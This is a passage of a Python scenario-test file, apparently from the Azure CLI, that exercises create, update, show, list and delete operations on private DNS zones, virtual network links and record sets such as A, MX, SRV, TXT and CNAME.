def _Create_ARecord(self, recordset, zone, arecord='10.0.0.1'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['arecord'] = arecord
recordsetResult = self.cmd('az network private-dns record-set a add-record -g {rg} -n {recordset} -z {zone} -a {arecord}', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(arecord in [o['ipv4Address'] for o in recordsetResult.get('aRecords')])
return recordsetResult
def _Create_AAAARecord(self, recordset, zone, aaaarecord='::1'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['aaaarecord'] = aaaarecord
recordsetResult = self.cmd('az network private-dns record-set aaaa add-record -g {rg} -n {recordset} -z {zone} -a {aaaarecord}', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(aaaarecord in [o['ipv6Address'] for o in recordsetResult.get('aaaaRecords')])
return recordsetResult
def _Create_MXRecord(self, recordset, zone, exchange='ex.chan.ge', preference=1):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['exchange'] = exchange
self.kwargs['preference'] = preference
recordsetResult = self.cmd('az network private-dns record-set mx add-record -g {rg} -n {recordset} -z {zone} -e {exchange} -p {preference}', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(exchange in [o['exchange'] for o in recordsetResult.get('mxRecords')])
self.assertTrue(preference in [o['preference'] for o in recordsetResult.get('mxRecords')])
return recordsetResult
def _Create_PTRRecord(self, recordset, zone, ptrdname='ptrd.name'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['ptrdname'] = ptrdname
recordsetResult = self.cmd('az network private-dns record-set ptr add-record -g {rg} -n {recordset} -z {zone} -d {ptrdname}', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(ptrdname in [o['ptrdname'] for o in recordsetResult.get('ptrRecords')])
return recordsetResult
def _Create_SRVRecord(self, recordset, zone, target='targ.et'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['port'] = 120
self.kwargs['priority'] = 1
self.kwargs['target'] = target
self.kwargs['weight'] = 5
recordsetResult = self.cmd('az network private-dns record-set srv add-record -g {rg} -n {recordset} -z {zone} -r {port} -p {priority} -t {target} -w {weight}', checks=[
self.check('name', '{recordset}'),
self.check('srvRecords[0].port', '{port}'),
self.check('srvRecords[0].priority', '{priority}'),
self.check('srvRecords[0].weight', '{weight}')
]).get_output_in_json()
self.assertTrue(target in [o['target'] for o in recordsetResult.get('srvRecords')])
return recordsetResult
def _Create_TXTRecord(self, recordset, zone, txtrecord='txt record'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['txtrecord'] = txtrecord
recordsetResult = self.cmd('az network private-dns record-set txt add-record -g {rg} -n {recordset} -z {zone} -v "{txtrecord}"', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(txtrecord in [o['value'][0] for o in recordsetResult.get('txtRecords')])
return recordsetResult
def _Create_CNAMERecord(self, recordset, zone, cname='clitestcname'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['cname'] = cname
recordsetResult = self.cmd('az network private-dns record-set cname set-record -g {rg} -n {recordset} -z {zone} -c {cname}', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(cname == recordsetResult.get('cnameRecord').get('cname'))
return recordsetResult
def _Update_RecordSet(self, recordset, recordType, zoneName, etag=None):
self.kwargs['recordset'] = recordset
self.kwargs['recordType'] = recordType.lower()
self.kwargs['zone'] = zoneName
tagKey, tagVal = GenerateTags(self)
update_cmd = 'az network private-dns record-set {recordType} update -g {rg} -n {recordset} -z {zone} --metadata {tags}'
if etag is not None:
self.kwargs['etag'] = etag
update_cmd = update_cmd + " --if-match {etag}"
return self.cmd(update_cmd, checks=[
self.check('name', '{recordset}'),
self.check('metadata.{}'.format(tagKey), tagVal)
]).get_output_in_json()
def _Show_RecordSet(self, recordset, recordType, zoneName, etag=None):
self.kwargs['recordset'] = recordset
self.kwargs['recordType'] = recordType.lower()
self.kwargs['zone'] = zoneName
show_cmd = 'az network private-dns record-set {recordType} show -g {rg} -n {recordset} -z {zone}'
return self.cmd(show_cmd, checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
def _List_RecordSet(self, recordType, zoneName, etag=None):
self.kwargs['recordType'] = recordType.lower()
self.kwargs['zone'] = zoneName
list_cmd = 'az network private-dns record-set {recordType} list -g {rg} -z {zone}'
return self.cmd(list_cmd).get_output_in_json()
def _Delete_ARecord(self, recordset, zone, arecord='10.0.0.1'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['arecord'] = arecord
recordsetResult = self.cmd('az network private-dns record-set a remove-record -g {rg} -n {recordset} -z {zone} -a {arecord} --keep-empty-record-set', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(arecord not in [o['ipv4Address'] for o in recordsetResult.get('aRecords', [])])
return recordsetResult
def _Delete_AAAARecord(self, recordset, zone, aaaarecord='::1'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['aaaarecord'] = aaaarecord
recordsetResult = self.cmd('az network private-dns record-set aaaa remove-record -g {rg} -n {recordset} -z {zone} -a {aaaarecord} --keep-empty-record-set', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(aaaarecord not in [o['ipv6Address'] for o in recordsetResult.get('aaaaRecords', [])])
return recordsetResult
def _Delete_MXRecord(self, recordset, zone, exchange='ex.chan.ge', preference=1):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['exchange'] = exchange
self.kwargs['preference'] = preference
recordsetResult = self.cmd('az network private-dns record-set mx remove-record -g {rg} -n {recordset} -z {zone} -e {exchange} -p {preference} --keep-empty-record-set', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(exchange not in [o['exchange'] for o in recordsetResult.get('mxRecords', [])])
self.assertTrue(preference not in [o['preference'] for o in recordsetResult.get('mxRecords', [])])
return recordsetResult
def _Delete_PTRRecord(self, recordset, zone, ptrdname='ptrd.name'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['ptrdname'] = ptrdname
recordsetResult = self.cmd('az network private-dns record-set ptr remove-record -g {rg} -n {recordset} -z {zone} -d {ptrdname} --keep-empty-record-set', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(ptrdname not in [o['ptrdname'] for o in recordsetResult.get('ptrRecords', [])])
return recordsetResult
def _Delete_SRVRecord(self, recordset, zone, target='targ.et'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['port'] = 120
self.kwargs['priority'] = 1
self.kwargs['target'] = target
self.kwargs['weight'] = 5
recordsetResult = self.cmd('az network private-dns record-set srv remove-record -g {rg} -n {recordset} -z {zone} -r {port} -p {priority} -t {target} -w {weight} --keep-empty-record-set', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(target not in [o['target'] for o in recordsetResult.get('srvRecords', [])])
return recordsetResult
def _Delete_TXTRecord(self, recordset, zone, txtrecord='txt record'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['txtrecord'] = txtrecord
recordsetResult = self.cmd('az network private-dns record-set txt remove-record -g {rg} -n {recordset} -z {zone} -v "{txtrecord}" --keep-empty-record-set', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(txtrecord not in [o['value'][0] for o in recordsetResult.get('txtRecords', [])])
return recordsetResult
def _Delete_CNAMERecord(self, recordset, zone, cname='clitestcname'):
self.kwargs['recordset'] = recordset
self.kwargs['zone'] = zone
self.kwargs['cname'] = cname
recordsetResult = self.cmd('az network private-dns record-set cname remove-record -g {rg} -n {recordset} -z {zone} -c {cname} --keep-empty-record-set', checks=[
self.check('name', '{recordset}')
]).get_output_in_json()
self.assertTrue(cname != recordsetResult.get('cnameRecord', {}).get('cname', ''))
return recordsetResult
def _Delete_RecordSet(self, recordset, recordType, zoneName, etag=None):
self.kwargs['recordset'] = recordset
self.kwargs['recordType'] = recordType.lower()
self.kwargs['zone'] = zoneName
getattr(self, self._RecordType_To_FunctionName(recordType, 'Delete'))(recordset, zoneName)
self.cmd('az network private-dns record-set {recordType} delete -g {rg} -n {recordset} -z {zone} -y')
class PrivateDnsZonesTests(BaseScenarioTests):
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PutZone_ZoneNotExists_ExpectZoneCreated(self, resource_group):
self._Create_PrivateZone()
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PutZone_ZoneNotExistsWithTags_ExpectZoneCreatedWithTags(self, resource_group):
GeneratePrivateZoneName(self)
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns zone create -g {rg} -n {zone} --tags {tags}', checks=[
self.check('name', '{zone}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PutZone_ZoneExistsIfNoneMatchFailure_ExpectError(self, resource_group):
self._Create_PrivateZone()
with self.assertRaisesRegexp(CLIError, 'exists already'):
self.cmd('az network private-dns zone create -g {rg} -n {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchZone_ZoneExistsIfMatchSuccess_ExpectZoneUpdated(self, resource_group):
zoneCreated = self._Create_PrivateZone()
self.kwargs['etag'] = zoneCreated['etag']
self.cmd('az network private-dns zone update -g {rg} -n {zone} --if-match {etag}', checks=[
self.check('name', '{zone}'),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchZone_ZoneExistsIfMatchFailure_ExpectError(self, resource_group):
self._Create_PrivateZone()
self.kwargs['etag'] = self.create_guid()
with self.assertRaisesRegexp(CloudError, 'etag mismatch'):
self.cmd('az network private-dns zone update -g {rg} -n {zone} --if-match {etag}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchZone_ZoneExistsAddTags_ExpectTagsAdded(self, resource_group):
self._Create_PrivateZone()
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns zone update -g {rg} -n {zone} --tags {tags}', checks=[
self.check('name', '{zone}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchZone_ZoneExistsChangeTags_ExpectTagsChanged(self, resource_group):
GeneratePrivateZoneName(self)
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns zone create -g {rg} -n {zone} --tags {tags}', checks=[
self.check('name', '{zone}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns zone update -g {rg} -n {zone} --tags {tags}', checks=[
self.check('name', '{zone}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchZone_ZoneExistsRemoveTags_ExpectTagsRemoved(self, resource_group):
GeneratePrivateZoneName(self)
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns zone create -g {rg} -n {zone} --tags {tags}', checks=[
self.check('name', '{zone}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
self.cmd('az network private-dns zone update -g {rg} -n {zone} --tags ""', checks=[
self.check('name', '{zone}'),
self.check('tags', '{{}}'),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchZone_ZoneNotExists_ExpectError(self, resource_group):
GeneratePrivateZoneName(self)
with self.assertRaisesRegexp(CloudError, 'ResourceNotFound'):
self.cmd('az network private-dns zone update -g {rg} -n {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchZone_ZoneExistsEmptyRequest_ExpectNoError(self, resource_group):
self._Create_PrivateZone()
self.cmd('az network private-dns zone update -g {rg} -n {zone}', checks=[
self.check('name', '{zone}'),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_GetZone_ZoneExists_ExpectZoneRetrieved(self, resource_group):
self._Create_PrivateZone()
self.cmd('az network private-dns zone show -g {rg} -n {zone}', checks=[
self.check('name', '{zone}'),
self.check_pattern('id', GeneratePrivateZoneArmId(self)),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_GetZone_ZoneNotExists_ExpectError(self, resource_group):
GeneratePrivateZoneName(self)
with self.assertRaisesRegexp(SystemExit, '3'):
self.cmd('az network private-dns zone show -g {rg} -n {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_ListZonesInSubscription_MultipleZonesPresent_ExpectMultipleZonesRetrieved(self, resource_group):
expectedZones = self._Create_PrivateZones(numOfZones=2)
returnedZones = self.cmd('az network private-dns zone list', checks=[
self.greater_than('length(@)', 1)
]).get_output_in_json()
self._Validate_Zones(expectedZones, returnedZones)
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_ListZonesInResourceGroup_MultipleZonesPresent_ExpectMultipleZonesRetrieved(self, resource_group):
expectedZones = self._Create_PrivateZones(numOfZones=2)
returnedZones = self.cmd('az network private-dns zone list -g {rg}', checks=[
self.check('length(@)', 2)
]).get_output_in_json()
self._Validate_Zones(expectedZones, returnedZones)
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_ListZonesInResourceGroup_NoZonesPresent_ExpectNoZonesRetrieved(self, resource_group):
self.cmd('az network private-dns zone list -g {rg}', checks=[
self.is_empty()
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_DeleteZone_ZoneExists_ExpectZoneDeleted(self, resource_group):
self._Create_PrivateZone()
self.cmd('az network private-dns zone delete -g {rg} -n {zone} -y')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_DeleteZone_ZoneNotExists_ExpectNoError(self, resource_group):
GeneratePrivateZoneName(self)
self.cmd('az network private-dns zone delete -g {rg} -n {zone} -y')
class PrivateDnsLinksTests(BaseScenarioTests):
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PutLink_LinkNotExistsWithoutRegistration_ExpectLinkCreated(self, resource_group):
self._Create_VirtualNetworkLink()
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PutLink_LinkNotExistsWithRegistration_ExpectLinkCreated(self, resource_group):
self._Create_VirtualNetworkLink(registrationEnabled=True)
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PutLink_LinkExistsIfNoneMatchFailure_ExpectError(self, resource_group):
self._Create_VirtualNetworkLink()
with self.assertRaisesRegexp(CLIError, 'exists already'):
self.cmd('az network private-dns link vnet create -g {rg} -n {link} -z {zone} -v {vnet} -e {registrationEnabled}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_LinkExistsIfMatchSuccess_ExpectLinkUpdated(self, resource_group):
linkCreated = self._Create_VirtualNetworkLink()
self.kwargs['etag'] = linkCreated['etag']
cmd = "az network private-dns link vnet update -g {rg} -n {link} -z {zone} --if-match '{etag}'"
self.cmd(cmd, checks=[
self.check('name', '{link}'),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_LinkExistsIfMatchFailure_ExpectError(self, resource_group):
self._Create_VirtualNetworkLink()
self.kwargs['etag'] = self.create_guid()
cmd = "az network private-dns link vnet update -g {rg} -n {link} -z {zone} --if-match '{etag}'"
with self.assertRaisesRegexp(CloudError, 'etag mismatch'):
self.cmd(cmd)
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_ZoneNotExists_ExpectError(self, resource_group):
GeneratePrivateZoneName(self)
GenerateVirtualNetworkLinkName(self)
with self.assertRaisesRegexp(CloudError, 'ResourceNotFound'):
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_LinkNotExists_ExpectError(self, resource_group):
self._Create_PrivateZone()
GenerateVirtualNetworkLinkName(self)
with self.assertRaisesRegexp(CloudError, 'ResourceNotFound'):
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_LinkExistsEmptyRequest_ExpectNoError(self, resource_group):
self._Create_VirtualNetworkLink()
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone}', checks=[
self.check('name', '{link}'),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_EnableRegistration_ExpectRegistrationEnabled(self, resource_group):
self._Create_VirtualNetworkLink()
self.kwargs['registrationEnabled'] = True
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone} -e {registrationEnabled}', checks=[
self.check('name', '{link}'),
self.check('registrationEnabled', '{registrationEnabled}'),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_DisableRegistration_ExpectRegistrationDisabled(self, resource_group):
self._Create_VirtualNetworkLink(registrationEnabled=True)
self.kwargs['registrationEnabled'] = False
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone} -e {registrationEnabled}', checks=[
self.check('name', '{link}'),
self.check('registrationEnabled', '{registrationEnabled}'),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_LinkExistsAddTags_ExpectTagsAdded(self, resource_group):
self._Create_VirtualNetworkLink()
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone} --tags {tags}', checks=[
self.check('name', '{link}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_LinkExistsChangeTags_ExpectTagsChanged(self, resource_group):
self._Create_VirtualNetworkLink()
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone} --tags {tags}', checks=[
self.check('name', '{link}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone} --tags {tags}', checks=[
self.check('name', '{link}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_LinkExistsRemoveTags_ExpectTagsRemoved(self, resource_group):
self._Create_VirtualNetworkLink()
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone} --tags {tags}', checks=[
self.check('name', '{link}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone} --tags ""', checks=[
self.check('name', '{link}'),
self.check('tags', '{{}}'),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_GetLink_ZoneNotExists_ExpectError(self, resource_group):
GeneratePrivateZoneName(self)
GenerateVirtualNetworkLinkName(self)
with self.assertRaisesRegexp(SystemExit, '3'):
self.cmd('az network private-dns link vnet show -g {rg} -n {link} -z {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_GetLink_LinkNotExists_ExpectError(self, resource_group):
self._Create_PrivateZone()
GenerateVirtualNetworkLinkName(self)
with self.assertRaisesRegexp(SystemExit, '3'):
self.cmd('az network private-dns link vnet show -g {rg} -n {link} -z {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_GetLink_LinkExists_ExpectLinkRetrieved(self, resource_group):
self._Create_VirtualNetworkLink()
self.cmd('az network private-dns link vnet show -g {rg} -n {link} -z {zone}', checks=[
self.check('name', '{link}'),
self.check_pattern('id', GenerateVirtualNetworkLinkArmId(self)),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_ListLinks_NoLinksPresent_ExpectNoLinksRetrieved(self, resource_group):
self._Create_PrivateZone()
self.cmd('az network private-dns link vnet list -g {rg} -z {zone}', checks=[
self.is_empty()
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_ListLinks_MultipleLinksPresent_ExpectMultipleLinksRetrieved(self, resource_group):
expectedLinks = self._Create_VirtualNetworkLinks(numOfLinks=2)
returnedLinks = self.cmd('az network private-dns link vnet list -g {rg} -z {zone}', checks=[
self.check('length(@)', 2)
]).get_output_in_json()
self._Validate_Links(expectedLinks, returnedLinks)
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_DeleteLink_ZoneNotExists_ExpectNoError(self, resource_group):
GeneratePrivateZoneName(self)
GenerateVirtualNetworkLinkName(self)
self.cmd('az network private-dns link vnet delete -g {rg} -n {link} -z {zone} -y')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_DeleteLink_LinkNotExists_ExpectNoError(self, resource_group):
self._Create_PrivateZone()
GenerateVirtualNetworkLinkName(self)
self.cmd('az network private-dns link vnet delete -g {rg} -n {link} -z {zone} -y')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_DeleteLink_LinkExists_ExpectLinkDeleted(self, resource_group):
self._Create_VirtualNetworkLink()
self.cmd('az network private-dns link vnet delete -g {rg} -n {link} -z {zone} -y')
class PrivateDnsRecordSetsTests(BaseScenarioTests):
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PutRecordSet_ZoneNotExists_ExpectError(self, resource_group):
GeneratePrivateZoneName(self)
GenerateRecordSetName(self)
with self.assertRaisesRegexp(CloudError, 'ResourceNotFound'):
self.cmd('az network private-dns record-set a create -g {rg} -n {recordset} -z {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PutRecordSet_IfNoneMatchFailure_ExpectError(self, resource_group):
zone = self._Create_PrivateZone()
self._Create_RecordSet('a', zone['name'])
with self.assertRaisesRegexp(CloudError, 'Precondition Failed'):
self.cmd('az network private-dns record-set {recordType} create -g {rg} -n {recordset} -z {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchRecordSet_IfMatchSuccess_ExpectRecordSetUpdated(self, resource_group):
zone = self._Create_PrivateZone()
recordset = self._Create_RecordSet('a', zone['name'])
self._Update_RecordSet(recordset['name'], 'a', zone['name'], recordset['etag'])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchRecordSet_IfMatchFailure_ExpectError(self, resource_group):
zone = self._Create_PrivateZone()
recordset = self._Create_RecordSet('a', zone['name'])
etag = self.create_guid()
with self.assertRaisesRegexp(CloudError, 'Precondition Failed'):
self._Update_RecordSet(recordset['name'], 'a', zone['name'], etag)
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_GetRecordSet_SoaRecord_ExpectRecordSetRetrieved(self, resource_group):
self._Create_PrivateZone()
self.cmd('az network private-dns record-set soa show -g {rg} -z {zone}', checks=[
self.check('name', '@'),
self.check('type', 'Microsoft.Network/privateDnsZones/SOA'),
self.exists('soaRecord.host'),
self.exists('soaRecord.email'),
self.exists('soaRecord.serialNumber'),
self.exists('soaRecord.refreshTime'),
self.exists('soaRecord.retryTime'),
self.exists('soaRecord.expireTime'),
self.exists('soaRecord.minimumTtl')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchRecordSet_SoaRecord_ExpectRecordSetUpdated(self, resource_group):
self._Create_PrivateZone()
self.kwargs['email'] = 'example.hostmaster.com'
self.kwargs['expireTime'] = 1
self.kwargs['minimumTtl'] = 2
self.kwargs['retryTime'] = 3
self.kwargs['refreshTime'] = 4
self.kwargs['serialNumber'] = 5
self.cmd('az network private-dns record-set soa update -g {rg} -z {zone} \
-e {email} -x {expireTime} -m {minimumTtl} -f {refreshTime} -r {retryTime} -s {serialNumber}', checks=[
self.check('name', '@'),
self.check('type', 'Microsoft.Network/privateDnsZones/SOA'),
self.check('soaRecord.email', '{email}'),
self.check('soaRecord.refreshTime', '{refreshTime}'),
self.check('soaRecord.retryTime', '{retryTime}'),
self.check('soaRecord.expireTime', '{expireTime}'),
self.check('soaRecord.minimumTtl', '{minimumTtl}')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchRecordSet_AddMetadata_ExpectMetadataAdded(self, resource_group):
zone = self._Create_PrivateZone()
self._Create_RecordSet('a', zone['name'])
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns record-set a update -g {rg} -n {recordset} -z {zone} --metadata {tags}', checks=[
self.check('name', '{recordset}'),
self.check('metadata.{}'.format(tagKey), tagVal)
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchRecordSet_ChangeMetadata_ExpectMetadataChanged(self, resource_group):
zone = self._Create_PrivateZone()
self._Create_RecordSet('a', zone['name'])
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns record-set a update -g {rg} -n {recordset} -z {zone} --metadata {tags}', checks=[
self.check('name', '{recordset}'),
self.check('metadata.{}'.format(tagKey), tagVal)
])
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns record-set a update -g {rg} -n {recordset} -z {zone} --metadata {tags}', checks=[
self.check('name', '{recordset}'),
self.check('metadata.{}'.format(tagKey), tagVal)
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchRecordSet_RemoveMetadata_ExpectMetadataRemoved(self, resource_group):
zone = self._Create_PrivateZone()
self._Create_RecordSet('a', zone['name'])
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns record-set a update -g {rg} -n {recordset} -z {zone} --metadata {tags}', checks=[
self.check('name', '{recordset}'),
self.check('metadata.{}'.format(tagKey), tagVal)
])
self.cmd('az network private-dns record-set a update -g {rg} -n {recordset} -z {zone} --metadata ""', checks=[
self.check('name', '{recordset}'),
self.check('metadata', '{{}}')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_CrudRecordSet_ARecord_ExpectCrudSuccessful(self, resource_group):
zone = self._Create_PrivateZone()
recordset = self._Create_RecordSet('a', zone['name'])
recordset = self._Update_RecordSet(recordset['name'], 'a', zone['name'])
recordset = self._Create_ARecord(recordset['name'], zone['name'], '10.0.0.4')
recordsetResult = self._Show_RecordSet(recordset['name'], 'a', zone['name'])
self.assertTrue(all(record in recordsetResult.get('aRecords') for record in recordset.get('aRecords')))
recordset = self._Delete_ARecord(recordset['name'], zone['name'], '10.0.0.4')
self._Delete_RecordSet(recordset['name'], 'a', zone['name'])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_CrudRecordSet_AAAARecord_ExpectCrudSuccessful(self, resource_group):
zone = self._Create_PrivateZone()
recordset = self._Create_RecordSet('aaaa', zone['name'])
recordset = self._Update_RecordSet(recordset['name'], 'aaaa', zone['name'])
recordset = self._Create_AAAARecord(recordset['name'], zone['name'], '2001::1')
recordsetResult = self._Show_RecordSet(recordset['name'], 'aaaa', zone['name'])
self.assertTrue(all(record in recordsetResult.get('aaaaRecords') for record in recordset.get('aaaaRecords')))
recordset = self._Delete_AAAARecord(recordset['name'], zone['name'], '2001::1')
self._Delete_RecordSet(recordset['name'], 'aaaa', zone['name'])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_CrudRecordSet_MXRecord_ExpectCrudSuccessful(self, resource_group):
zone = self._Create_PrivateZone()
recordset = self._Create_RecordSet('mx', zone['name'])
recordset = self._Update_RecordSet(recordset['name'], 'mx', zone['name'])
recordset = self._Create_MXRecord(recordset['name'], zone['name'], 'ex.change.new', preference=2)
recordsetResult = self._Show_RecordSet(recordset['name'], 'mx', zone['name'])
self.assertTrue(all(record in recordsetResult.get('mxRecords') for record in recordset.get('mxRecords')))
recordset = self._Delete_MXRecord(recordset['name'], zone['name'], 'ex.change.new', preference=2)
self._Delete_RecordSet(recordset['name'], 'mx', zone['name'])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_CrudRecordSet_PTRRecord_ExpectCrudSuccessful(self, resource_group):
zone = self._Create_PrivateZone()
recordset = self._Create_RecordSet('ptr', zone['name'])
recordset = self._Update_RecordSet(recordset['name'], 'ptr', zone['name'])
recordset = self._Create_PTRRecord(recordset['name'], zone['name'], 'ptrd.name.new')
recordsetResult = self._Show_RecordSet(recordset['name'], 'ptr', zone['name'])
self.assertTrue(all(record in recordsetResult.get('ptrRecords') for record in recordset.get('ptrRecords')))
recordset = self._Delete_PTRRecord(recordset['name'], zone['name'], 'ptrd.name.new')
self._Delete_RecordSet(recordset['name'], 'ptr', zone['name'])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_CrudRecordSet_TXTRecord_ExpectCrudSuccessful(self, resource_group):
zone = self._Create_PrivateZone()
recordset = self._Create_RecordSet('txt', zone['name'])
recordset = self._Update_RecordSet(recordset['name'], 'txt', zone['name'])
recordset = self._Create_TXTRecord(recordset['name'], zone['name'], 'new txt record')
recordsetResult = self._Show_RecordSet(recordset['name'], 'txt', zone['name'])
self.assertTrue(all(record in recordsetResult.get('txtRecords') for record in recordset.get('txtRecords')))
recordset = self._Delete_TXTRecord(recordset['name'], zone['name'], 'new txt record')
self._Delete_RecordSet(recordset['name'], 'txt', zone['name'])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_CrudRecordSet_CNAMERecord_ExpectCrudSuccessful(self, resource_group):
zone = self._Create_PrivateZone()
